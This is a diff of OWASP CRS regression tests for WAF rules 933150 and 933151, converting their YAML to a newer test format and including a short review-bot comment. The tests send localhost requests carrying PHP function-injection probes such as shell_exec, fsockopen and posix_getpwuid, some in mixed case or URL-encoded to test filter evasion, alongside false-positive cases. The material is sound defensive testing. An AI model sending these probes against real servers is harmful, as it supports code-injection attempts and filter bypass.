- test_id: 5 desc: call_user_func stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?foo=FOOcall_user_func" - version: "HTTP/1.1" - output: - log_contains: id "933150" - - test_title: 933150-6 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?foo=FOOcall_user_func" + version: "HTTP/1.1" + output: + log: + expect_ids: [933150] + - test_id: 6 desc: fsockopen stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: 
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?foo=FOOfsockopen" - version: "HTTP/1.1" - output: - log_contains: id "933150" - - test_title: 933150-7 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?foo=FOOfsockopen" + version: "HTTP/1.1" + output: + log: + expect_ids: [933150] + - test_id: 7 desc: gzdecode stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?foo=FOOgzdecode" - version: "HTTP/1.1" - output: - log_contains: id "933150" - - test_title: 933150-8 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?foo=FOOgzdecode" + version: "HTTP/1.1" + output: + log: + expect_ids: [933150] + - test_id: 8 desc: GzInFlAtE stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?foo=FOOGzInFlAtE" - version: "HTTP/1.1" - output: - log_contains: id "933150" - - test_title: 933150-9 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?foo=FOOGzInFlAtE" + version: "HTTP/1.1" + output: + log: + 
expect_ids: [933150] + - test_id: 9 desc: pHpInFo mixed case stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?foo=FOOpHpInFo" - version: "HTTP/1.1" - output: - log_contains: id "933150" - - test_title: 933150-10 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?foo=FOOpHpInFo" + version: "HTTP/1.1" + output: + log: + expect_ids: [933150] + - test_id: 10 desc: gzuncompress stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?I%20don%27t%20like%20gzuncompress" - version: "HTTP/1.1" - output: - log_contains: id "933150" - - test_title: 933150-11 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?I%20don%27t%20like%20gzuncompress" + version: "HTTP/1.1" + output: + log: + expect_ids: [933150] + - test_id: 11 desc: fsockopen stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - port: 80 - uri: "/get?bar=pfsockopen%28%27foo%27%2C%2025%29" - version: "HTTP/1.1" - output: - log_contains: id "933150" - - test_title: 933150-12 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + 
User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + port: 80 + uri: "/get?bar=pfsockopen%28%27foo%27%2C%2025%29" + version: "HTTP/1.1" + output: + log: + expect_ids: [933150] + - test_id: 12 desc: posix_getpwuiD stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?bar=posix_getpwuiD%28%27foo%27%2C%2025%29" - version: "HTTP/1.1" - output: - log_contains: id "933150" - - test_title: 933150-13 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?bar=posix_getpwuiD%28%27foo%27%2C%2025%29" + version: "HTTP/1.1" + output: + log: + expect_ids: [933150] + - test_id: 13 desc: shell_exec stages: - - stage: - input: - data: Shell%5fexec=bla - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - version: "HTTP/1.1" - output: - log_contains: id "933150" - - test_title: 933150-14 + - input: + data: Shell%5fexec=bla + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + version: "HTTP/1.1" + output: + log: + expect_ids: [933150] + - test_id: 14 desc: ZlIb_DeCoDe stages: - - stage: - input: - data: ZlIb%5fDeCoDe=bla - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: 
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - version: "HTTP/1.1" - output: - log_contains: id "933150" - - test_title: 933150-15 + - input: + data: ZlIb%5fDeCoDe=bla + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + version: "HTTP/1.1" + output: + log: + expect_ids: [933150] + - test_id: 15 desc: get_defined_functions stages: - - stage: - input: - data: foo=get_defined_functions%28%29%5B0%5D - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - version: "HTTP/1.1" - output: - log_contains: id "933150" - - test_title: 933150-16 + - input: + data: foo=get_defined_functions%28%29%5B0%5D + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + version: "HTTP/1.1" + output: + log: + expect_ids: [933150] + - test_id: 16 desc: get_defined_vars stages: - - stage: - input: - data: foo=get_defined_vars%28%29%5B0%5D - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - version: "HTTP/1.1" - output: - log_contains: id "933150" - - test_title: 933150-17 + - input: + data: foo=get_defined_vars%28%29%5B0%5D + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: 
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + version: "HTTP/1.1" + output: + log: + expect_ids: [933150] + - test_id: 17 desc: | PHP function call in body, mixed case. payload: curl_iNit() stages: - - stage: - input: - data: foo=curl_iNit%28%29 - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - version: "HTTP/1.1" - output: - log_contains: id "933150" - - test_title: 933150-18 + - input: + data: foo=curl_iNit%28%29 + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + version: "HTTP/1.1" + output: + log: + expect_ids: [933150] + - test_id: 18 desc: | PHP function call in body payload: posix_getegid() stages: - - stage: - input: - data: posix_getegid%28%29 - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - version: "HTTP/1.1" - output: - log_contains: id "933150" - - test_title: 933150-19 + - input: + data: posix_getegid%28%29 + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + version: "HTTP/1.1" + output: + log: + expect_ids: [933150] + - test_id: 19 desc: | PHP function call in body, mixed case payload: Print_r() stages: - - stage: - input: - data: x=Print_r%28%20%29 - dest_addr: 127.0.0.1 - headers: - Host: localhost - 
User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post/print_r" - version: "HTTP/1.1" - output: - log_contains: id "933150" - - test_title: 933150-20 + - input: + data: x=Print_r%28%20%29 + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post/print_r" + version: "HTTP/1.1" + output: + log: + expect_ids: [933150] + - test_id: 20 desc: | PHP function call in body. payload: strrev() stages: - - stage: - input: - data: x=strrev%28%20%29 - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post/strrev" - version: "HTTP/1.1" - output: - log_contains: id "933150" - - test_title: 933150-21 + - input: + data: x=strrev%28%20%29 + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post/strrev" + version: "HTTP/1.1" + output: + log: + expect_ids: [933150] + - test_id: 21 desc: | False Positive test payload: the files (yep) stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?foo=the%20files%20%28yep%29" - version: "HTTP/1.1" - output: - no_log_contains: id "933150" - - test_title: 933150-22 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: 
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?foo=the%20files%20%28yep%29" + version: "HTTP/1.1" + output: + log: + no_expect_ids: [933150] + - test_id: 22 desc: | False Positive test, exec should be followed by parenthesis payload: exec ( stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?foo=exec%20%28" - version: "HTTP/1.1" - output: - no_log_contains: id "933150" - - test_title: 933150-23 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?foo=exec%20%28" + version: "HTTP/1.1" + output: + log: + no_expect_ids: [933150] + - test_id: 23 desc: | False Positive test payload: executor() stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?foo=executor%28%29" - version: "HTTP/1.1" - output: - no_log_contains: id "933150" - - test_title: 933150-24 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?foo=executor%28%29" + version: "HTTP/1.1" + output: + log: + no_expect_ids: [933150] + - test_id: 24 desc: | False Positive test payload: cheval($foo) stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: 
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?foo=cheval%28%24foo%29" - version: "HTTP/1.1" - output: - no_log_contains: id "933150" - - test_title: 933150-25 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?foo=cheval%28%24foo%29" + version: "HTTP/1.1" + output: + log: + no_expect_ids: [933150] + - test_id: 25 desc: | False Positive test payload: audiofile($foo) stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?foo=audi%6ffile%28%24foo%29" - version: "HTTP/1.1" - output: - no_log_contains: id "933150" - - test_title: 933150-26 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?foo=audi%6ffile%28%24foo%29" + version: "HTTP/1.1" + output: + log: + no_expect_ids: [933150] + - test_id: 26 desc: | False Positive test payload: the system is down() stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?foo=the%20system%20is%20down%28%29" - version: "HTTP/1.1" - output: - no_log_contains: id "933150" - - test_title: 933150-27 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: 
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?foo=the%20system%20is%20down%28%29" + version: "HTTP/1.1" + output: + log: + no_expect_ids: [933150] + - test_id: 27 desc: | False Positive test payload: ecosystem() stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?foo=ecosystem%28%29" - version: "HTTP/1.1" - output: - no_log_contains: id "933150" - - test_title: 933150-28 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?foo=ecosystem%28%29" + version: "HTTP/1.1" + output: + log: + no_expect_ids: [933150] + - test_id: 28 desc: | False Positive test, function doesn't exist payload: systems() stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?foo=systems%28%29" - version: "HTTP/1.1" - output: - no_log_contains: id "933150" - - test_title: 933150-29 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?foo=systems%28%29" + version: "HTTP/1.1" + output: + log: + no_expect_ids: [933150] + - test_id: 29 desc: | False Positive test, function doesn't exist payload: system something() stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: 
"OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?foo=system%20something%28%29" - version: "HTTP/1.1" - output: - no_log_contains: id "933150" - - - test_title: 933150-30 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?foo=system%20something%28%29" + version: "HTTP/1.1" + output: + log: + no_expect_ids: [933150] + - test_id: 30 desc: "Snippets of English words (like `prev`) should not be matched, requiring regex match with word boundaries (e.g. 933160)" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post?a=preview" - version: "HTTP/1.1" - output: - no_log_contains: id "933150" - - test_title: 933150-31 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post?a=preview" + version: "HTTP/1.1" + output: + log: + no_expect_ids: [933150] + - test_id: 31 desc: "Snippets of English words (like `exp`) should not be matched, requiring regex match with word boundaries (e.g. 
933160)" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post?a=exploration" - version: "HTTP/1.1" - output: - no_log_contains: id "933150" - - test_title: 933150-32 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post?a=exploration" + version: "HTTP/1.1" + output: + log: + no_expect_ids: [933150] + - test_id: 32 desc: | PHP mixed case function call with space, LF between (). payload: file_ExistS (\n\n) stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?foo=file_ExistS%20%28%0A%0A%29" - version: "HTTP/1.1" - output: - log_contains: id "933150" - - test_title: 933150-33 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?foo=file_ExistS%20%28%0A%0A%29" + version: "HTTP/1.1" + output: + log: + expect_ids: [933150] + - test_id: 33 desc: | PHP function call with multiple whitespaces. 
payload: fopen (blah) stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?foo=fopen%20%20%28blah%29" - version: "HTTP/1.1" - output: - log_contains: id "933150" + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?foo=fopen%20%20%28blah%29" + version: "HTTP/1.1" + output: + log: + expect_ids: [933150] diff --git a/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933151.yaml b/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933151.yaml index a7e7303d5..06ebd3a85 100644 --- a/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933151.yaml +++ b/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933151.yaml 
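Review bot: test_id 11 in 933150.yaml (`desc: fsockopen`, uri `/get?bar=pfsockopen%28%27foo%27%2C%2025%29`) is the only input in this file without a `method:` line, carried over unchanged from the old side; the request presumably falls back to whatever go-ftw 1.0.3 defaults to, so the case is not self-describing like the other 32 and would be clearer with `method: GET` added after the `Accept:` header. Its desc also repeats test 6's `fsockopen` although the payload exercises `pfsockopen` with arguments; `desc: pfsockopen with arguments` distinguishes the two in the runner output. Tests 19 and 20 post to `/post/print_r` and `/post/strrev` while every other body test uses `/post`; if that path variance is intentional, a one-line desc note would save the next reader checking it.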
@@ -1,136 +1,134 @@ --- meta: author: "lifeforms, ssigwart, azurit" - description: None - enabled: true - name: 933151.yaml +rule_id: 933151 tests: - - test_title: 933151-1 + - test_id: 1 desc: "pmf + chain" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get/array_diff%20%28" - version: "HTTP/1.1" - output: - log_contains: id "933151" - - test_title: 933151-2 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get/array_diff%20%28" + version: "HTTP/1.1" + output: + log: + expect_ids: [933151] + - test_id: 2 desc: "pmf + chain" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?date_ADD%28%29" - version: "HTTP/1.1" - output: - log_contains: id "933151" - - test_title: 933151-3 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?date_ADD%28%29" + version: "HTTP/1.1" + output: + log: + expect_ids: [933151] + - test_id: 3 desc: "non-dangerous PHP functions, removed to reduce FP" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?foo=filemtime%28%24foo%29" - 
version: "HTTP/1.1" - output: - no_log_contains: id "933151" - - test_title: 933151-4 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?foo=filemtime%28%24foo%29" + version: "HTTP/1.1" + output: + log: + no_expect_ids: [933151] + - test_id: 4 desc: "pmf + chain" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "gethostbynamE(" - version: "HTTP/1.1" - output: - log_contains: id "933151" - - test_title: 933151-5 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "gethostbynamE(" + version: "HTTP/1.1" + output: + log: + expect_ids: [933151] + - test_id: 5 desc: "No parenthesis after keyword" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?foo=array_diff" - version: "HTTP/1.1" - output: - no_log_contains: id "933151" - - test_title: 933151-6 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?foo=array_diff" + version: "HTTP/1.1" + output: + log: + no_expect_ids: [933151] + - test_id: 6 desc: "rule should not trigger when there are other words 
before parenthesis" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?a=ceiling%20height(9ft)" - version: "HTTP/1.1" - output: - no_log_contains: id "933151" - - test_title: 933151-7 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?a=ceiling%20height(9ft)" + version: "HTTP/1.1" + output: + log: + no_expect_ids: [933151] + - test_id: 7 desc: "snippets of Eng words (like prev) should not be matched, requiring regex match with word boundaries (e.g. 933160)" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?a=preview" - version: "HTTP/1.1" - output: - no_log_contains: id "933151" - - test_title: 933151-8 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?a=preview" + version: "HTTP/1.1" + output: + log: + no_expect_ids: [933151] + - test_id: 8 desc: "snippets of Eng words (like exp) should not be matched, requiring regex match with word boundaries (e.g. 
